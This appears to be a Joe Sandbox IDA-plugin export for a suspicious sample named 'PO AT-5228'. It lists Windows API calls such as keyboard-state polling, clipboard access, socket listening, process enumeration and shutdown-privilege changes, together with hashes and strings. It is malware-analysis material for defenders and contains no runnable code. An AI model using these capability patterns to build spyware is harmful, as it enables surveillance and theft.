                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: 6173a1b300d9987a911fdf078f36c7e73fa509ec01540e840091e83b5489383a
                                                                                        • Instruction ID: 5fcafcf4b11c143b76800dff9b7d35d70b315751a31afc0a252d2b6f49ff1f2d
                                                                                        • Opcode Fuzzy Hash: 6173a1b300d9987a911fdf078f36c7e73fa509ec01540e840091e83b5489383a
                                                                                        • Instruction Fuzzy Hash: 80517D71204241AFD310AB64DD96FBE7BF8EB94B00F040569F686DB1D1DFB8DD098A62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BAF62B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BAF67F
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BAF6A4
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BAF6BB
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BAF6E2
                                                                                        • __swprintf.LIBCMT ref: 00BAF72E
                                                                                        • __swprintf.LIBCMT ref: 00BAF767
                                                                                        • __swprintf.LIBCMT ref: 00BAF7BB
                                                                                          • Part of subcall function 00B8172B: __woutput_l.LIBCMT ref: 00B81784
                                                                                        • __swprintf.LIBCMT ref: 00BAF809
                                                                                        • __swprintf.LIBCMT ref: 00BAF858
                                                                                        • __swprintf.LIBCMT ref: 00BAF8A7
                                                                                        • __swprintf.LIBCMT ref: 00BAF8F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 835046349-2428617273
                                                                                        • Opcode ID: ea23cda50cc844a9fb81a8db2b715dafd97ba1b854372a92ea473b8e2f7c3a68
                                                                                        • Instruction ID: 29c18b6676c035335216c34482a48bcc11d40f590b6f7ce5c6598de7da9ca1e3
                                                                                        • Opcode Fuzzy Hash: ea23cda50cc844a9fb81a8db2b715dafd97ba1b854372a92ea473b8e2f7c3a68
                                                                                        • Instruction Fuzzy Hash: B4A10CB2508345ABC310EBA4C885DBFB7ECEF98704F444C6EB69587151EB34DA49CB62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00BB1B50
                                                                                        • _wcscmp.LIBCMT ref: 00BB1B65
                                                                                        • _wcscmp.LIBCMT ref: 00BB1B7C
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00BB1B8E
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00BB1BA8
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00BB1BC0
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1BCB
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00BB1BE7
                                                                                        • _wcscmp.LIBCMT ref: 00BB1C0E
                                                                                        • _wcscmp.LIBCMT ref: 00BB1C25
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB1C37
                                                                                        • SetCurrentDirectoryW.KERNEL32(00C139FC), ref: 00BB1C55
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB1C5F
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1C6C
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1C7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: 54c9c5d947cf8bb879103a031f8e1eb08c344fda9720f1309efb00390a874a9f
                                                                                        • Instruction ID: 464b60b4d5ffcab802eff19c8ee30401de147d96d5f251d15e9d09dafc97720f
                                                                                        • Opcode Fuzzy Hash: 54c9c5d947cf8bb879103a031f8e1eb08c344fda9720f1309efb00390a874a9f
                                                                                        • Instruction Fuzzy Hash: 3631B6315012596FDF20EFA8DC99AEE7BECEF05310F5049D5E911E7090EBB0DE858A64
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00BB1CAB
                                                                                        • _wcscmp.LIBCMT ref: 00BB1CC0
                                                                                        • _wcscmp.LIBCMT ref: 00BB1CD7
                                                                                          • Part of subcall function 00BA6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BA6BEF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00BB1D06
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1D11
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00BB1D2D
                                                                                        • _wcscmp.LIBCMT ref: 00BB1D54
                                                                                        • _wcscmp.LIBCMT ref: 00BB1D6B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB1D7D
                                                                                        • SetCurrentDirectoryW.KERNEL32(00C139FC), ref: 00BB1D9B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB1DA5
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1DB2
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BB1DC2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 90292b50250f4f6c090b6fdbc141758ae4f8d4c3b93c89e70879e15ca4cecacb
                                                                                        • Instruction ID: 5010bcd8d5f669f3dbb0b02144ab12541a30d498324fa298799830da1931ee92
                                                                                        • Opcode Fuzzy Hash: 90292b50250f4f6c090b6fdbc141758ae4f8d4c3b93c89e70879e15ca4cecacb
                                                                                        • Instruction Fuzzy Hash: BF31F43250165A6BCF10EFA8DC59AEE37EDDF05324F5049E1E901A70A0DBB0DE85CB64
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                        • API String ID: 2102423945-2023335898
                                                                                        • Opcode ID: 9e296ae24dceb627a7454ea218b077095307a2dcb3a7eaf159e171784290ec75
                                                                                        • Instruction ID: 8a987d2f8e6ec86222711baf2ed6104b018c9aa0ec70a7723f4f5eeaaf07cc73
                                                                                        • Opcode Fuzzy Hash: 9e296ae24dceb627a7454ea218b077095307a2dcb3a7eaf159e171784290ec75
                                                                                        • Instruction Fuzzy Hash: 71829071D0421ADBCB24CF94C8806ADBBF1FF48314F2581EAD85AAB351E7789D85DB90
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00BB09DF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB09EF
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BB09FB
                                                                                        • __wsplitpath.LIBCMT ref: 00BB0A59
                                                                                        • _wcscat.LIBCMT ref: 00BB0A71
                                                                                        • _wcscat.LIBCMT ref: 00BB0A83
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB0A98
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0AAC
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0ADE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0AFF
                                                                                        • _wcscpy.LIBCMT ref: 00BB0B0B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BB0B4A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                        • String ID: *.*
                                                                                        • API String ID: 3566783562-438819550
                                                                                        • Opcode ID: a82b2e9d2a795247821af482bd41eb8c71b49af25815ef8352d678405b985df8
                                                                                        • Instruction ID: 4087c14fb702fdf65c3b486edb4fae555819c27f8d76b5767b4952e00019e195
                                                                                        • Opcode Fuzzy Hash: a82b2e9d2a795247821af482bd41eb8c71b49af25815ef8352d678405b985df8
                                                                                        • Instruction Fuzzy Hash: EE617A725183059FD710EF64C8809AFB3E8FF89310F0489AAF989C7251DB75E949CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                                                          • Part of subcall function 00B9ABBB: GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                                                          • Part of subcall function 00B9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                                                          • Part of subcall function 00B9ABBB: HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                                                          • Part of subcall function 00B9AC56: GetProcessHeap.KERNEL32(00000008,00B9A6B5,00000000,00000000,?,00B9A6B5,?), ref: 00B9AC62
                                                                                          • Part of subcall function 00B9AC56: HeapAlloc.KERNEL32(00000000,?,00B9A6B5,?), ref: 00B9AC69
                                                                                          • Part of subcall function 00B9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B9A6B5,?), ref: 00B9AC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B9A6D0
                                                                                        • _memset.LIBCMT ref: 00B9A6E5
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B9A704
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A715
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B9A752
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B9A76E
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A78B
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B9A79A
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B9A7A1
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B9A7C2
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00B9A7C9
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B9A7FA
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B9A820
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B9A834
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: f05d59aebac56e52c159f23d7829bfd87e4d337b4ca16c0fab9cebe5c7e643ee
                                                                                        • Instruction ID: 15efa3c7e71a83125500b19a300ee5027f2b2d2d294dd96076e697bf2baa4685
                                                                                        • Opcode Fuzzy Hash: f05d59aebac56e52c159f23d7829bfd87e4d337b4ca16c0fab9cebe5c7e643ee
                                                                                        • Instruction Fuzzy Hash: 2D514A71900249AFDF10DFA5DC95AEEBBF9FF04300F048169F911AB291DB759A06CBA1
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                        • API String ID: 0-4052911093
                                                                                        • Opcode ID: 112b2966b03705d6bec84380f64b636769d9122097d6b918b58d84a71dea1dd3
                                                                                        • Instruction ID: 9b5843d76f971d74a3abffba831cfb8bc9a51fda686ba509d583c7d4f8dcd22a
                                                                                        • Opcode Fuzzy Hash: 112b2966b03705d6bec84380f64b636769d9122097d6b918b58d84a71dea1dd3
                                                                                        • Instruction Fuzzy Hash: BA725C71E042699BDF14CF59C8807AEB7F5FF48714F1481AAE809AB380DB749E81DB94
                                                                                        APIs
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                                                          • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                                                        • _wcscat.LIBCMT ref: 00BA6441
                                                                                        • __wsplitpath.LIBCMT ref: 00BA645F
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BA6474
                                                                                        • _wcscpy.LIBCMT ref: 00BA64A3
                                                                                        • _wcscat.LIBCMT ref: 00BA64B8
                                                                                        • _wcscat.LIBCMT ref: 00BA64CA
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA64DA
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BA64EB
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA6506
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2643075503-1173974218
                                                                                        • Opcode ID: a1c02a1f062ff393ae933436e39f7297df3c94d164e037caa674617404592538
                                                                                        • Instruction ID: 4955fcd41e8db578958da51c1aa166524baf3d7a717c1936e7949d1e6f939fea
                                                                                        • Opcode Fuzzy Hash: a1c02a1f062ff393ae933436e39f7297df3c94d164e037caa674617404592538
                                                                                        • Instruction Fuzzy Hash: AD3182F280C388AEC721EBA488859DB77DCAF56310F44096AF6D9C3141EA35D50DC7A7
                                                                                        APIs
                                                                                          • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC328E
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BC332D
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BC33C5
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BC3604
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BC3611
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: e0b9bf21f3b629d2d10c9aef82e88883f341e8a0f5ca7cf3e2b035b5ccdd3845
                                                                                        • Instruction ID: 20d03a4eb3716d03dfa6062c610b8d55aaa3ed509ac9bac34ef2c7e531ea6f3d
                                                                                        • Opcode Fuzzy Hash: e0b9bf21f3b629d2d10c9aef82e88883f341e8a0f5ca7cf3e2b035b5ccdd3845
                                                                                        • Instruction Fuzzy Hash: CEE14B71604210AFCB15DF28C995E2ABBE8FF89714B04C4ADF44ADB262DB35E905CB52
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA2B5F
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00BA2BE0
                                                                                        • GetKeyState.USER32(000000A0), ref: 00BA2BFB
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00BA2C15
                                                                                        • GetKeyState.USER32(000000A1), ref: 00BA2C2A
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00BA2C42
                                                                                        • GetKeyState.USER32(00000011), ref: 00BA2C54
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00BA2C6C
                                                                                        • GetKeyState.USER32(00000012), ref: 00BA2C7E
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00BA2C96
                                                                                        • GetKeyState.USER32(0000005B), ref: 00BA2CA8
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 3a58b5828003cb2ba8a70661a7f3a20f85db5d6532feb23da30a376c382c76ce
                                                                                        • Instruction ID: 590cd1c7b49b95b7ed65ae4aa28d55982f21c3f5490bb85d05777f6a202e2c06
                                                                                        • Opcode Fuzzy Hash: 3a58b5828003cb2ba8a70661a7f3a20f85db5d6532feb23da30a376c382c76ce
                                                                                        • Instruction Fuzzy Hash: B041D83450C7C96EFF349B6889443AABEE0EB23314F4440D9D9C65B6C1EBA499C4C7A2
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: 3ce262ce0a9c321660d7e173d7303f62ca6916c6f39373d9db4cb59ca22c44d5
                                                                                        • Instruction ID: b2994438a565fa295cb75a90cd5512738f29f6fcbadb817a4a2d92ed8dae540b
                                                                                        • Opcode Fuzzy Hash: 3ce262ce0a9c321660d7e173d7303f62ca6916c6f39373d9db4cb59ca22c44d5
                                                                                        • Instruction Fuzzy Hash: 1F214C31300110AFDB11AF64DD89B6D77E8EF54711F0484A9F90ADB2A1DFB9ED018B55
                                                                                        APIs
                                                                                          • Part of subcall function 00B99ABF: CLSIDFromProgID.OLE32 ref: 00B99ADC
                                                                                          • Part of subcall function 00B99ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00B99AF7
                                                                                          • Part of subcall function 00B99ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00B99B05
                                                                                          • Part of subcall function 00B99ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B99B15
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BBC235
                                                                                        • _memset.LIBCMT ref: 00BBC242
                                                                                        • _memset.LIBCMT ref: 00BBC360
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00BBC38C
                                                                                        • CoTaskMemFree.OLE32(?), ref: 00BBC397
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 00BBC3E5
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: 26126c87c23c30c51ba59883289c58e9099ac58342b84df9e438c1cd05628232
                                                                                        • Instruction ID: 571b7cedf21f9e4c1636ddf096dc545e51cd5c02068ea492b6ebd2f79f3849e9
                                                                                        • Opcode Fuzzy Hash: 26126c87c23c30c51ba59883289c58e9099ac58342b84df9e438c1cd05628232
                                                                                        • Instruction Fuzzy Hash: 69910971D00218ABDB10DF94DC95EEEBBF9EF04710F1081AAF519A7291DBB19A45CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 00B9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                                                          • Part of subcall function 00B9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                                                          • Part of subcall function 00B9B134: GetLastError.KERNEL32 ref: 00B9B1BA
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00BA7A0F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: b04fd7abeda935ea301f7b4fed8ce06f072ec0f75836364a3718be60bff15627
                                                                                        • Instruction ID: 779327c0b85400409b8cecfc9fe4a1cd9b356f391e00abd9de90bd77154f7feb
                                                                                        • Opcode Fuzzy Hash: b04fd7abeda935ea301f7b4fed8ce06f072ec0f75836364a3718be60bff15627
                                                                                        • Instruction Fuzzy Hash: E201A7757EC2517FFB285768DC9ABBF73D8DB02740F2404A5B953A60D2DDA15E0081A4
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BB8CA8
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8CB7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00BB8CD3
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00BB8CE2
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8CFC
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00BB8D10
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: 8025cc7d954b1dca86e5e8ee4c72a6445fcf3472dd76fdcea0cf674bc406d78e
                                                                                        • Instruction ID: 9c5f9f25ecdfe606819f1b709624a37cf774951199018dcfff775b8c650b28ab
                                                                                        • Opcode Fuzzy Hash: 8025cc7d954b1dca86e5e8ee4c72a6445fcf3472dd76fdcea0cf674bc406d78e
                                                                                        • Instruction Fuzzy Hash: 9521A0716002009FCB10AF68C985BBEB7E9EF49310F108199F916AB2D2CBB0AD45CB51
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00BA6554
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA6564
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00BA6583
                                                                                        • __wsplitpath.LIBCMT ref: 00BA65A7
                                                                                        • _wcscat.LIBCMT ref: 00BA65BA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00BA65F9
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1605983538-0
                                                                                        • Opcode ID: 99cf76ad92150c5f7fc352107173d951af54e48ee9c7c9f4eeae9ab5bff0b190
                                                                                        • Instruction ID: 592bb7ca622c100a3ead99a18d2b1b58010940dd683f67d53fcbee8c8642f881
                                                                                        • Opcode Fuzzy Hash: 99cf76ad92150c5f7fc352107173d951af54e48ee9c7c9f4eeae9ab5bff0b190
                                                                                        • Instruction Fuzzy Hash: 9F2153B1904258ABDB10ABA4CC88BDDB7FCAB55300F5404E9E905E7141DBB19F85CB61
                                                                                        APIs
                                                                                          • Part of subcall function 00BBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00BB9296
                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00BB92B9
                                                                                        Similarity
                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 4170576061-0
                                                                                        • Opcode ID: 5e1acebaa0f4f3a9b111230d80ca3a4e9c2f31df4c427c6ac582d984e4f79d40
                                                                                        • Instruction ID: 47201bf38e5121886102eaca03494c2b8641163d97008dc6393807f35c787a8c
                                                                                        • Opcode Fuzzy Hash: 5e1acebaa0f4f3a9b111230d80ca3a4e9c2f31df4c427c6ac582d984e4f79d40
                                                                                        • Instruction Fuzzy Hash: 16419370600204AFDB14AF68CC92E7E77EDEF44724F14859CF95AAB3D2DAB49D018B91
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BAEB8A
                                                                                        • _wcscmp.LIBCMT ref: 00BAEBBA
                                                                                        • _wcscmp.LIBCMT ref: 00BAEBCF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00BAEBE0
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00BAEC0E
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
